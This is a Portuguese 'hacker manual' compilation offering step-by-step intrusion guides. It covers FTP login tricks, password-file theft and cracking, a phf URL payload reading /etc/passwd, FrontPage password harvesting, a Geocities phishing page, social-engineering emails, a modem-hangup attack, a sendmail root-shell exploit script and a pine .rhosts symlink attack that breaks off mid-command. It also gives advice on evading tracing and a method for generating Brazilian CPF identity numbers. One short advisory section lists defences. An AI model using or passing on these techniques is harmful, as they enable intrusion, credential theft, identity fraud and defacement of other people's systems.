Manual Hacker



Yüklə 308,5 Kb.
səhifə2/3
tarix29.11.2017
ölçüsü308,5 Kb.
#33269
1   2   3

Como ser um hacker?
Como me Transformar em um Hacker?
Parece que muitas e muitas pessoas, todos os dias fazem esta pergunta em grupos de notícias, através de e-mail, em salas de chat. Não há nenhuma resposta simples, desde que cada um deve seguir seu próprio caminho. Mas há uma coisa que você deve ter para almejar o status de um hacker: determinação! Você deve ter um apetite voraz para encontrar informação e ensinar a si mesmo. Você não pode contar com outros, não pode contar com a escola. O curso de digitação não o levará a lugar algum.
Conseguindo Ajuda
É verdade que existe centenas e centenas de home pages de "hackers" na Internet. Se você nunca tentou enviar um e-mail para algum deles, uma coisa certamente se torna evidente, a falta de conhecimento. Qualquer pessoa (eu inclusive!) pode colocar uma página na Internet, adicionando links, textos,... de outros e se chamar um hacker. Mas peça por ajuda para escrever um shel script para explorar um bug e você ficará ligeiramente disapontado. Claro! há alguns hackers genuinos por aí, e se você conseguir encontrá-los, poderá pedir ajuda. Mas aí você estará dependendo de alguém para tudo. Um hacker deve ser autoditada.
Algumas Outras Necessidades
É importante saber e aceitar que você estará sob fogo, quando outros ouvirem sobre o seu interesse em se tornar um hacker. É para ser esperado: você está tentando ser parte de uma minoria que é odiada pelo grande público da área, por causa de imagem ruim que é comumente difundida. Deve discordar de comentários negativos e de julgamentos apressados. E finalmente, você deve ser humilde para se tornar um hacker. É absolutamente necessário admitir que você sabe apenas 1 por cento do que há para se saber sobre o mundo da informática e seus pecados, no objetivo de sempre direcionar seus esforços para aprender mais. Alguma vez, já notou que pessoas com grandes egos são idiotas ? Adivinhe por que ? Se você acha que sabe tudo, por que se encomodar em continuara aprendendo ? Um hacker tem um desejo insaciável por informação, são obssesivos sobre tudo, sejam redes telefônicas, internet, computadores ou qualquer coisa. É por este motivo que um hacker, constantemente, "explora" por mais informação. Então você precisa de tempo livre para se dedicar ao aprendizado. E o que você deve aprender ?
Tomando Os Primeiros Passos
Um conceito errado sobre hackers é que você deve ser um gênio em programação. Isto não é verdade! Claro, que quanto mais você souber melhor. Você precisa realmente saber algum shell scripting e linguagem C, básicos. Aqui o que eu acredito ser o mais essencial no aprendizado de um hacker: Primeiro, você deve aprender sobre o sistema operacional UNIX. Ele é um dos sistemas operacionais mais usados em servidores na Internet. Acessando um sistema UNIX via Telnet ou um terminal de cliente, não irá apresentar-lhe uma interface gráfica interessante, é um ambiente de somente texto, como o DOS. Não há gráficos, apenas um simples e extremamente eficiente sistema operacional que está muito a frente de seu tempo, desde quando foi criado. É claro que você poderá encontrar o X-Windows em máquinas Unix e rodar uma enorme variedade de aplicativos gráficos, mas é irrelevante para esta discussão. Você precisa ter um conhecimento complexo do sistema operacional. Sabendo como ele funciona em detalhes, é essencial. O código-fonte é distribuído gratuitamente para UNIX e seus variantes, e desta forma você deve estudá-lo. Compre livros, procure pela internet, consiga informações de todas as fontes que puder. Apenas esteja apto a usar o UNIX como se o usasse por toda a sua vida. Muitas pessoas esquecem as lições básicas e acham que precisam aprender apenas sobre as medidas de segurança do sistema operacional. Isto é fútil, como você poderá "penetrar" em um sistema se você não sabe usá-lo para simples tarefas rudimentares, como trocar diretórios, listar arquivos, ver quem está conectado, etc,... Além disso, como mencionei anteriormente, você precisa ter experiência em shell scripting. Quanto melhor nisso, você for, melhor e mais completo hacker você será. Saber também um pouco de linguagem C é também imperativo, desde que você irá precisar de alterar códigos, programação de socket para a técnica de spoofing e ataques fragmentados,... Uma vez que você saiba os fundamentos do UNIX, aprenda sobre as suas funções primárias de rede com protocolos da Internet. É essencial entender como um computador comunica-se com outro pela Internet. O próximo passo é aprender especialmente sobre segurança em sistemas UNIX, que incluem o design das permissões de acesso e firewall. Novamente, todas estas informações podem ser encontradas nas mágicas coisas chamadas livros.

Agora que você tem um entendimento total sobre UNIX, você poderá aprender como contornar a segurança nestes sistemas. Existem vários arquivos na Internet tratando sobre os últimos bugs, como o bugtraq e 8lgm.org. Comece a mater uma trilha imaginária nas falhas em vários serviços, e então quando você inspecionar um sistema ele irá surgir em sua mente.


A Psicologia de Hacke(ar)
É importante entender como o cérebro humano funciona em outras pessoas. Para se ter uma ideia de como comprometer a segurança de computadores, você deve "penetrar" na mente do administrador do sistema e pensar como você protegeria o sistema se fosse o encarregado. Você deve também levar em consideração que a muitas das pessoas são estúpidas, e isto será decisivo se você estiver tentando descobrir algumas senhas. Use o senso comum.
Nunca Pare de Aprender
Não pare aqui! Depois de entender sobre redes e UNIX, continue aprendendo mais. O que sobrou ? VAX/VMS, que é outro sistema operacional encontrado em alguns computadores conectados na Internet. Você pode começar explorando o mundo da criptografia (o que é suicídio se você odeia matemática). Mantenha-se atualizado nos novos desenvolvimentos em tecnologia. Simplificando: aprenda tudo o que puder todo dia.

Eis algumas abilidades de Kevin Mitnick (talvez o mais famoso hacker de todos os tempos): VM/CMS, OS/VS1, DOS/VSE, MS-DOS, RST/E, VAX/VMS, UNIX, TOP-20,... Familiarizado com algum destes ? Isto só nos faz pensar em uma coisa, vamos estudar!!!


Fazendo a Conexão
Constantemente, escuta-se uma pergunta MUITO comum dos iniciantes: "Como eu me conecto a um sistema ?" ou "Como eu uso o Telnet ?" Para explicar algumas questões básicas: Você pode se conectar com qualquer máquina ligada na Internet com um programa de Telnet. Muitos programas utilizam o serviço de telnet quando você conecta-se a uma máquina. Por exemplo, se eu rodar meu programa e conectar com o xyz.com, ele irá me conectar com a porta 23, a porta da Telnet do xyz.com. Telnet, simplesmente, é um meio de se usar um terminal UNIX, como se você estivesse sentado em frente a um. Imagine estar discando em uma máquina em ambiente DOS e recebendo o prompt C:\>. É essencialmente a mesma coisa. Quando você aprender sobre UNIX, você verá que existem outros serviços (também conhecido como dameons), e poderá usar um programa de Telnet para conectar-se a vários deles. Onde encontrar tais programas ? Que tal em http://www.tucows.com/, eles possuem vários deles.
Se você puder instalar uma variação do UNIX como o LINUX em seu computador, eu certamente sugiro-lhe que o faça. Este é o melhor caminho para aprender o sistema operacional. Além disso, o LINUX possui excelentes utilitários que o acompanham, como o GNU C compiler.
Também é importante identificar um erro comum que os iniciantes cometem quando aprendem por arquivos de texto. Não confundam TELENET com TELNET. TELENET é uma grande rede de servidores, agora também conhecido como SprintNet. Possui um sistema operacional especial e é acessado por números de acesso discado com um programa de terminal. Uma vez conectado você pode acessar diferentes servidores pelo seu NUA (Network User Address). Hacke(ar) em redes como SprintNet/Telenet é uma prática arriscada, por ser fácilmente rastreada. Você está discado diretamente na rede de sua linha telefônica. Novamente, um servidor pode simplesmente gravar o seu endereço IP se você conectar-se na Internet e usar a identificação de cliente para possivelmente conseguir o seu username do seu provedor.
Como Não Ser Pego
O erro que provavelmente todo hacker comete é que ele ou ela torna-se muito convencido ou popular. Não saia gritando que é um hacker na escola. Confie em menos pessoas posíveis. Quanto menos pessoas souberem que você está nisso, melhor. Não faça coisas idiotas, como hacke(ar) da sua própria casa a algum sistema de alta segurança. Embora este método está agora, "fora de moda", desde que existem meios mais fáceis de esconder sua identidade quando hack(eando) pela Internet. Existem vários meios para dificultar o rastreamento quando hack(eando) sistemas da Internet. Um deles, é conectar-se em diversos servidores com Telnet antes de acertar o seu alvo. Isto tornará o rastreamento muito mais difícil. Tente conectar-se a sistemas localizados em outros países. Nunca tente hack(ear) uma instituição governamental, você irá ser pego e irá para a cadeia! Não seja estúpido achando ser bom demais para ser pego. Nunca fale sobre hack(ear) ao telefone principalmente nos sem fio, você nunca sabe quem está ouvindo. Encripte suas mensagens de e-mail. Seja um pouco paranoico! Quanto mais paranoico você for, menos chance você terá de ser pego.
Último, Mas Muito Importante
Sempre digo que conhecimento é apenas metade do que faz um hacker. A outra metade é a ética. Você pode ser um perfeito gênio, mas se não tiver ética, você está no mesmo nível de um criminoso. Todo hacker possui um código de ética.
Você Não é um Hacker se
* Você pirateia software

* Você espalha viroses (qualquer um com um pouco de conhecimento de Assembler pode criar um vírus)

* Você deleta arquivos alheios e destroi seus sistemas (qualquer um pode deletar um arquivo)

* Você rastreia empresas de cartão de crédito ou bancos para conseguir dinheiro.



Ataques via FTP

Para Hackear um Servidor FTP, Primeiro vc deve saber o endereço do Host ou seu IP, para isto use o IPSCAN, digitando o IP Principal do Host:

Lista de Alguns FTP's

ftp.mandic.com.br

ftp.netscape.com

ftp.angelfire.com


Let's HaCk !!!

Existem vários Programas de FTP'S, se não quiser saber de ftp porra nenhuma use o do DOS !!!

Vá ao Prompt e digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu IP, tipo (to) ftp.mandic.com.br ou outro servidor. Ao conectar ele pedirá a senha e o Password, tente user os passwords UNIX, se não der vc deve entrar INVISÍVEL !!!!
Como entrar Invisível??????

No login pressione ENTER, no password pressione Novamente... . Ira aparecer o prompt ftp> novamente...., ai é só digitar... quote user ftp , pressione ENTER e digite:

quote cwd ~root

Pressione ENTER novamente e digite:

quote pass ftp
Pronto, vc esta Hackeando...

Mas tem um porem..., se escrever a mensagem : user restriction aplly, vc não esta Hackeando.., pois esta aplicada a proteção..., para isto tente com outro user tipo quote cwd ~sys e os outros da lista UNIX....


ATENÇÃO !!!!

Não tente Hackear usando o user normal de FTP'S, que é login : anonymous e password: seu E-Mail, pois vai ser aplicado a proteção....

MEU DEUS, EU ENTREI e AGORA o QUE FAÇO??????

Ao entrar vc vai estar no Diretório do login, tipo \home\root\, dai, para ver a lista de users vc volta um dir vá para o dir \home\ e cada dir é um usuário,... não tentem pegar as senhas , pois são Cryptografadas... Pois a maioria dos users usa a mesma senha login.... Ok... se vc não sabe os comandos, ai vai a dica...., se vc estiver no MS-DOS, digite ? e tecle ENTER em qualquer lugar, pois irá aparecer os comandos... e ai é só Hackear !!!

Não fique mais que 5 Min em um servidor, pois ele caçara seu IP, e seu login, e vai ser na #CADEIA# onde você vai parar !

Não me responsabilizo por atos cometidos nos Hosts... o problema é de quem HaCkEiA, e não meu, pois tome muito cuidado, e NUNCA apague NADA !!!!!!!!


Tutorial 2
Ataque por FTP
A invasão por FTP é, de certa forma, simples de ser efetuadas, embora seja muito lenta e cansativa. Para isso exercê-la, você pode usar programas como o WebCracker e uma boa Wordlist, embora existam melhores programas.Este processo nada mais é do que um "jogo de tentativa e erro", onde você pode esperar o programa trabalhar, ou você mesmo pode entrar em ação, caso você tenha informações sobre o proprietário ta conta que você quer hackear; mas não se esqueça que nada que produza um bom resultado é fácil de ser realizado. Na maioria das vezes os servidores matêm logado os IPs que tiveram tentativas frustadas ao tentarem a conexão com o servidor FTP, por isso, não se esqueça de sempre, mas sempre utilizar um proxy anônimo quando for realizar este tipo de ataque... senão, isso pode ter consequencias mais graves do que você imagina. Bom, este tipo de ataque geralmente é utilizado para o hackeamento de páginas ou para a aquisição do arquivo se senhas do provedor, e como fazê-lo? Da seguinte forma: Suponhamos que você queira hackear um página, já conseguiu o Login e Senha dela, aí já tá na mão... é so usar um programa qualquer como o WS_FTP ou qualquer outro e modificar o código HTML da página. No caso do furto do arquivo de senhas, a coisa muda de figura... nunca subestime um Sysop, ele é mais inteligente do que você imagina, e, provavelmente não vai deixar o arquivo exposto no diretório /etc para que você possa simplesmente ir lá baixar o arquivo, então, provavelmente terá que sair procurar o arquivo pelos diretórios e depois, você pode utilizar a mesma wordlist usada anteriormente para desencryptar o arquivo de senhas. Lembre-se que somente entrando "anonymous" em um provedor você NÃO estará hackeando...

CPF

O número de CPF é formado por 11 dígitos, nesse esquema: xxxxxxxxx-xx. Por meio deste texto, pretendo explicar como funciona o algorítmo de geração desse número.

Primeiramente, invente os nove primeiros dígitos, por exemplo, 542369851-xx. Os x's servem para deixar o algorítmo correto. Vou explicar nas seguintes linhas como obter o primeiro e o segundo dígito que tanto nos interessa.
1)DESVENDANDO O PRIMEIRO DÍGITO:

Calcule:


10*d1 + 9*d2 + 8*d3 + 7*d4 + 6*d5 + 5*d6 + 4*d7 + 3*d8 + 2*d9

OBS: dx é a posição do dígito. ex:d2 = Segundo dígito, no caso do nosso exemplo, o número quatro.

Se você foi nas aulas de Matemática, vai chegar no resultado 253.

Agora, divida esse número por 11 (número total de dígitos no CPF). Novamente, se não faltou nas aulas, irá obter o número 23 como resultado.

OBS: Se esta divisão der um número com casas decimais depois da vírgula, como por exemplo 23,2 ignore o que vem depois da vírgula, considere apenas o inteiro.

Multiplique dessa vez 23 * 11 (numero da divisão * numero total de digitos do CPF). Agora, Subtraia do número 253, vindo da primeira conta que você teve de fazer, o número obtido com a multiplicação 23 * 11. Se o resto for igual a 0 ou igual a 1, o primeiro dígito depois do hífen no CPF será igual a 0, obteremos assim o seguinte: 542369851-0x.

Se o resultado da subtração for diferente de 0 e 1, para obter o primeiro x calcule: 11 menos o resto da subtração.
2)DESVENDANDO O SEGUNDO DÍGITO:

Falta o segundo x. Vamos desvendá-lo... calcule o seguinte:

11*d1 + 10*d2 + 9*d3 + 8*d4 + 7*d5 + 6*d6 + 5*d7 + 4*d8 + 3*d9 + 2*pridig

OBS:"dx" é a posição do dígito e "pridig" é o primeiro x depois do hífen, no nosso caso, o número 0.

Se você tem um pouco de massa encefálica dentro da cabeça, obterá o resultado 296. Divida isso por 11(número de dígitos do CPF). Obterá 26,909. Use só a parte inteira desse número e multiplique por 11 (26 * 11) O resultado será 286. Subtraia 296(vindo da primeira conta pra esse dígito) por 286(conta que acabamos de fazer). Obteremos o resultado 10. Vale a mesma regra que usamos no primeiro x. Se o resto for 0 ou 1, o x é igual a 0, se o resto da subtração for diferente de 0 ou 1, subtraia 11 pelo número. ex: Se a subtração der 5, faça 11 - 5 = 6. o x vai ser igual a 6. Mas voltando ao nosso número, o x deu igual a 10. Ou seja, o x é igual a 1. Assim sendo, CPF VÁLIDO obtido por nós foi: 542369851-01.
3)CONCLUSÃO:

parabéns para nós!!! Tá aí... o algoritmo de geração de CPF's prontinho...

Isso pode ser útil de duas formas:

1º Se você precisar de um número de CPF, faça-o!

2º Se você tiver conhecimentos em alguma linguagem de programação, faça um programa que gera esses números!

Derrubando usuários Lammers do Linux
Alguns lamers estão utilizando linux e entrando nos canais de IRC e apavorando outros lamers, mas o pior é que esses lamers que fazem isso só utilizam o Linux mesmo para fazer isso. Leram em alguma página que o Linux derruba qualquer um do IRC, que ele é o melhor sistema operacional que tem, que ele é ótimo para hackear... Certo... isso tudo é verdade! Não sou contra a arte hacker, mas sou completamente contra esses caras que usam o Linux para se sentirem superiores... vao se fuder!
Bom, baseado no que eu disse acima resolvi publicar um bug do Linux que derruba qualquer usuário dele que utiliza um modem para se conectar a Internet. Ps.: A porta de FTP ou de SMTP tem que está aberta!
Curte só: conecte no IP do PlayBoy por uma das portas abaixo e siga o que se fala:
* FTP (porta 21)
Após ter conectado, vai está esperando voce digitar o user e password, aí digite:
USER +++ATH0 (<- isso é um zero viu)
Desconecte dele... (se ele já não fizer isso por voce!)
Agora repita o procedimento mais uma vez.

* SMTP (25)


Após ter conectado digite:
VRFY +++ATH0
Desconecte dele...
Repita novamente!
É isso aí, após voce ter feito isso o cara terá sido desconectado! Esse bug existe a mais de 10 anos e ninguém fez nada contra ainda! é mole?

Hackeando extenções FrontPage
Estou aqui para explicar à vocês como penetrar em servidores rodando Microsoft Frontpage Extensions. A principal razão pela qual eu não incluí sub-capítulos no conteúdo foi porque... eu estou muito cansado.
Encontrando servidores que rodam extensões Frontpage.

Usando seu browser, vá até algum destes sites:

metacrawler.com, yahoo.com, google.com, excte.com

Procure por haccess.htl service.pwd


NOTA:

-> service.pwd é o arquivo padrão para senhas

-> haccess.htl contém o diretório atual do arquivo password se o service.pwd é falso ou as senhas estão em shadow
Note também que o service.pwd não é o único arquivo de senhas que pode ser encontrado. admin.pwd, users.pwd, Authors.pwd, administrators.pwd, também podem ser encontrados.
Ok. Depois de procurar, você encontrará uma lista com cerca de 100 sites rodando extensões frontpage. Clique em um dos links. Se você clicou em algum arquivo haccess.htl, você verá algo assim:
-Front Page-
Options None

order deny,allow

deny from all

AuthName default_realm

AuthUserFile c:/frontpage\ webs.content/_vti_pvt/service.pwd

AuthGroupFile c:/frontpage\ webs.content/_vti_pvt/service.pwd


Nós vamos focalizar as duas últimas linhas. O AuthUserFile. Este é o diretório atual do arquivo password ativo (não é falso ou shadowed). Agora, faça o download do arquivo de senhas através do diretório especificado.
Volte aos resultados da procura. Se você clicou em um dos links e foi levado ao arquivo de senhas você verá algo do tipo:
systemphuc:aBcDeFj
Copie isso e coloque em formato DES (UNIX):
systemphuc:aBcDeFj:0:0:comments:/:/bin/bash
Agora, crackeie isso usando seu cracker de senhas unix favorito. Eu gosto de usar John the Ripper. Ok, agora você tem um login e senha válidos. Isso pode ser usado de duas formas. A primeira é o IPC$ share (será discutido em outra oportunidade) e a Segunda é hackear o servidor de extensões frontpage. Para fazer isso abra o seu FrontPage, vá em File>Open ou Open Frontpage Web put, isso mostrará uma pequena “bola” opcional, marque-a e depois coloque a “bola” no endereço IP do servidor ou do endereço http (isso é meio confuso, mas é assim que se faz). Depois clique em conectar. Se o servidor não tiver senha você estará conectado e apto a alterar a página. Mas se o software foi instalado adequadamente e o username/senha forem solicitados... coloque o username/password que eu te mostrei como descobrir e crackeie. Clique em ok, agora você estará apto a alterar as páginas.
Você pode colocar mensagens na página como:

"im a big stupid fuck i hacked you page, ha ha ha... ha ha ha".

Vulnerabilidade no aplicativo FrontPage

Ao longo dos últimos meses vem se verificando um crescimento na exploração, com sucesso, de vulnerabilidades no aplicativo Front Page. Estas vulnerabilidades permitem a um usuário remoto obter acesso `a arquivos e diretorios de um servidor WEB, permitindo obtenção dos arquivos de senhas dos administradores do serviço Front Page, ou a modificação direta do conteúdo das páginas publicadas.


2. Impacto

Nota-se que o ambiente Windows com IIS 4.0 é seguramente onde tem ocorrido maior número de ataques, mas outros ambientes que permitam atualização via Front Page, (módulo para servidor Apache em Windows ou Unix, por exemplo) também são vulneráveis.


3. Solução

- Retire os arquivos de exemplos que acompanham a distribuição

- Aplique as correções ou atualize a versão do aplicativo Front Page

[http://www.microsoft.com/security]

- Habilite autenticação ao Extension Server

- Monitore atividades, principalmente em arquivos e diretórios usados pelo

Front Page, tais como: _vti_bin, _vti_pvt, _vti_inf.html, admin.dll, etc.

- Proteja o arquivo de senhas 'service.pwd'

Ex:


Order deny,allow
Deny from all


Hackeando WebPages

1-INTRODUÇÃO :

O texto a seguir fala sobre como hackear uma home page. Aqui estão as suas seções :

Precauções-cuidados que você deve tomar.


Sobre as senhas-arquivos falando sobre as senhas.

Desencryptando as senhas-como desencryptar senhas.

Ftp-como hackear uma HP por ftp.

Phf-como hackear uma HP usando o método phf

Home page grátis-como hackear servidores de home page grátis

Home page grátis 2-Outro método de como hackear servidores de home pages grátis

Já cadastrado-Como hackear uma home page que você já tenha cadastro no mesmo servidor

Telnet e exploits-Como hackear uma page usando telnet e exploits

Já cadastrado 2-Outro metodo de como hackear uma hp que você já tenha cadastro no mesmo servidor.
2-PRECAUÇÕES:
Nesse texto vou ensinar diversos métodos de como hackear uma home page. Queria avisar que hackear uma home page é considerado crime e que isso dá cadeia. Toda vez que você entra em um sistema seu IP fica gravado e "eles" vão poder te encontrar. Portanto antes de cometer um ato como esse eu sugiro que vocês tomem umas medidas de segurança como spoofing e etc...
3-SOBRE AS SENHAS :
A senha esta em um arquivo chamado passwd. Esse arquivo está normalmente em um diretório chamado etc/passwd. Então vamos falar um pouco sobre o passwd. Quando você pega o arquivo passwd, a senha pode vir encryptada ou então com shadow! A diferença é que a senha encryptada é a própria senha só que esta encryptada e a senha com shadow faz com que a senha fique escondida em outro lugar! Ou seja, não vai estar no passwd, vai estar em outro diretório. Para obter a senha escrita você vai ter que desencripta-la! As senhas com shadow são impossíveis de "desencryptar"! (levando em conta que você não tem unix). Uma senha encryptada é mais ou menos assim :

root:User:d7Bdg:1n2HG2:1127:20:Superuser

TomJones:p5Y(h0tiC:1229:20:Tom

Jones,:/usr/people/tomjones:/bin/csh

BBob:EUyd5XAAtv2dA:1129:20:Billy

Bob:/usr/people/bbob:/bin/csh


Agora o exemplo de uma senha com shadow :

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh

daemon:x:1:1:0000-Admin(0000):/:

bin:x:2:2:0000-Admin(0000):/usr/bin:

sys:x:3:3:0000-Admin(0000):/:

adm:x:4:4:0000-Admin(0000):/var/adm:

lp:x:71:8:0000-lp(0000):/usr/spool/lp:

smtp:x:0:0:mail daemon user:/:

uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:

nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/

usr/lib/uucp/uucico

listen:x:37:4:Network Admin:/usr/net/nls:

nobody:x:60001:60001:uid no body:/:

noaccess:x:60002:60002:uid no access:/:

webmastr:x:53:53:WWW

Admin:/export/home/webmastr:/usr/bin/csh

pin4geo:x:55:55:PinPaper

Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false

ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Você pode notar que tem um "x" no root! Esse x pode ser representado também por um "*". Agora você já sabe um pouco mais sobre o arquivo passwd e sobre as senhas.
4-DESENCRYPTANDO :
Para desencryptar uma senha precisaremos de três arquivos básicos. Uma word list, um desencryptador (recomendo o crackerjack/jack 14)e logicamente o arquivo onde está senha(passwd). O que é cada um? Word list- Como o próprio nome já diz, é uma lista de palavras. Desencryptador- É o programa que você vai usar para desencryptar a senha. Passwd- Nesse arquivo está a senha encryptada.
Coloque todos esses itens nesse mesmo diretório. Abra o prompt do DOS e entre no diretório onde eles estão. Agora faça o seguinte, digite : "nome do programa desencryptador" "nome do arquivo onde esta a senha" "nome da sua word list" Então vamos supor que meu programa é o jack, o arquivo é o passwd, a word list é lista. Então ficaria assim : jack passwd lista.txt
E pronto! A senha está desencryptada! Mas como isso funciona?? Quando você roda o jack ele pega o arquivo passwd e testa com todas as palavras da word list.
5-FTP
Hackear uma HP por ftp talvez seja o melhor metodo. É bem simples e rápido de ser feito. Para fazer isso vamos usar o prompt do MS-DOS. Espero que você saiba pelo menos mexer no básico do DOS. O que vamos fazer é simplesmente entrar no ftp da home page com login anonymous e fazer o download do arquivo passwd. Abra o prompt do DOS. Você vai ter que entrar no ftp da HP que voce quer hackear. Normalmente a endereço é o mesmo da home page. Então digite ftp www.hackers.com Ele vai pedir seu USER. Coloque anonymous. Agora vai pedir que você coloque seu e-mail completo como senha. Claro que você vai colocar alguma coisa qualquer, tipo fuckyou@idiota.com. Você vai entrar no ftp como user anonymous e retrictions applly! Isso significa que você entrou como anonymous e com restrições aplicadas! Agora você precisa ir para o diretório etc. Entre e faça o donwload do passwd. Pra isso digite "get passwd". Pronto, o arquivo passwd vai estar no diretório que você estava quando entrou no ftp. Tipo windows, arquivos de programas.... Agora você que tem o arquivo só precisa desencryptalo e pronto! A senha estará em suas mãos..
6-PHF : O phf é com certeza o modo mais simples de se obter o arquivo passwd. É tão simples que você não precisa saber nada! A única coisa que você tem que fazer é abrir seu browser e colocar uma URL. Porém esse método tem 95% de chance de não funcionar! A maioria dos servidores já acharam o bug e concertaram. Só colocar essa URL no location do seu browser :

http://Endereço_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd


Apenas isso e pronto!
7-HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1):
Alguns servidores de home page tipo a geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home pages no ar. Há um modo bem simples de se obter ]a senha de home pages que estão nesses servidores. Tudo que voce tem que fazer é mandar um e-mail pedindo pra eles te mandarem a senha da home page. Mas não mande um e-mail estúpido tipo : "por favor me mandem a senha". Façam algo mais convincente. Pegue todas as informações da HP possíveis. Do tipo : "Mês passado eu me cadastrei no serviço de vocês e recebi uma senha e um user name e meu endereço "endereço da HP do cara". Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é : "user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem."

Companhias como a geocities são muito ocupadas pra ficar verificando se é verdade eu não! Provavelmente eles iram acreditar e em 2 semanas(mais ou menos) você receberá a senha no seu e-mail!

8- HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2): Outro modo de hackear esse tipo de home pages é enganar o próprio webmaster da HP! Esse modo funciona normalmente com webmasters idiotas que não sabem muito coisa e nem percebem que eles mesmos estão dando a senha para o hackeador. É outro método bem simples mas um pouco mais demorado. O que você tem que fazer é criar uma pagina onde você finge que é a geocities que esta dando mais megas para HP's! Ou seja, você terá que criar uma página imitando a geocities! Faça uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formulário pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espaço pra HP!!! Nesse formulário o cara terá que colocar o user e a senha da HP, o endereço e etc.... Para o cara "receber" os megas ele terá que enviar o formulário. Para isso ela deverá clicar em algum botão de envio, normalmente um botão que fica escrito "submit" Quando a pessoa clica no botão submit formulário é enviado para a geocities pois aquele botão tem um comando para enviar para a geocities.Então o que você terá que fazer é mudar o comando. Em vez do formulário ser enviado para a geocities esse formulário vai ser enviado para o seu e-mail. Para isso você terá que editar a pagina da geocities. No lugar que tem escrito:

Você tará que trocar para :

Então assim que o cara clicar no botão submit todos os dados seram enviados para o seu e-mail. E assim você terá a senha. Agora é só pegar um endereço na net e colocar essa pagina editada na geocities nele e mandar as pessoas visitarem. E pronto! O formulário vai chegar com a senha e user name no teu e-mail.

Há uma tecnica parecida com essa mas é MUITO mais complicada. Pra isso você vai precisar de um servidor pessoal e terá que mudar algumas configurações em TCP/IP Pra isso abra o painel de controle e entre no ícone redes. Agora entre nas propriedades de TCP/IP. Entre na conficuração DNS. Selecione ativar DNS. Agora escreva no HOST-->WWW.GEOClTIES(repare que geocities está escrito com "l" e não um "i") Então escreva no dominio-->COM. Agora dê OK em tudo. Vai pedir que você reinicie o micro. Pode reiniciar. Siga o mesmo procedimento do formulário e da pagina da geocities da explicação anterior. Salva essa pagina e coloque-a no diretório de paginas do seu servidor. Então voce cria um diretório chamado "members", entra nesse diretório e crie um, diretório chamado "tools". Coloque tudo da page editada nesse diretório. Coloque seu servidor pra funcionar e mande o cara entrar em : HTTP://WWW.GEOClTIES.COM/members/tools/file_manager.html

O endereço tem que ser esse. Se a pessoa entrar no file manager da geocities isso não vai funcionar(ooohhh!!!) Quando o cara colocar os dados dele lá e enviar estará tudo no teu mail!

Queria avisar que esses metodos também funcionam com a angelfire e com a tripod. A geocities foi usada como exemplo.


9-HACKEANDO UMA HP EM QUE VOCE JÁ TENHA CADASTRO NO MESMO
SERVIDOR Esse método é realmente difícil de funcionar mas as vezes funciona com uns admins bem idiotas. Quando você entra no seu ftp você pode sair do seu diretório home (diretorio onde você esta assim que entra) e voltar alguns diretórios até encontrar o diretório da HP que você quer hackear. Uma vez que voce já fez, se você puder ter acesso aos arquivos HTML pegue-os e edite eles! E pronto! Com admins mais inteligentes você não consegue ter acesso os arquivos da page alvo.
10-TELNET E EXPLOITS : Exploits é talvez o melhor método de hackear uma home page. Mas ele é um pouco mais complicado do que os outros métodos como phf e ftp. Antes de tudo você vai precisar de um programa de telnet. Exploits expo em erros e bugs nos sistemas e normalmente te dão root, sysop, admin.... Vou listar alguns exploits abaixo :

Esse se chama sendmail bug. Ele cria um programa /tmp/x que chama shells como root.


cat << _EOF_ >/tmp/x.c

#define RUN "/bin/ksh"

#include

main()


{

execl(RUN,RUN,NULL);

}

_EOF_


#

cat << _EOF_ >/tmp/spawnfish.c

main()

{

execl("/usr/lib/sendmail","/tmp/smtpd",0);



}

_EOF_


#

cat << _EOF_ >/tmp/smtpd.c

main()

{

setuid(0); setgid(0);



system("chown root /tmp/x ;chmod 4755 /tmp/x");

}

_EOF_



#

#

gcc -O -o /tmp/x /tmp/x.c



gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c

gcc -O3 -o /tmp/smtpd /tmp/smtpd.c

#

/tmp/spawnfish



kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed

s/"[ ]*"// |cut -d" " -f1`

rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd

/tmp/x.c


sleep 5

if [ -u /tmp/x ] ; then

echo "leet..."

/tmp/x


fi
Agora mais um exploit. Eu vou mostrar o "pine exploit" vendo o processo da tabela com ps você pode ver

os usuário rodando o pine. Um então pode fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada

usuário. Vendo o processo da tabela de novo vai revelar quais usuarios ou saem com mensagens não lidas

nos seus inbox. Efetivamente deletando o lockfile respectivo.

Criando um link de /tmp/.hamors_lockfile para ~hamors/.rhosts vai fazer com que o pine crie

~hamors/.rhosts como com um arquivo 666 com as identidades processadas e que elas contém.

Agora precisa fazer um " echo "+ +" > /tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile.
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine

catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep

pine

hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine


catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors

- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05

.302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine

catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep

pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts

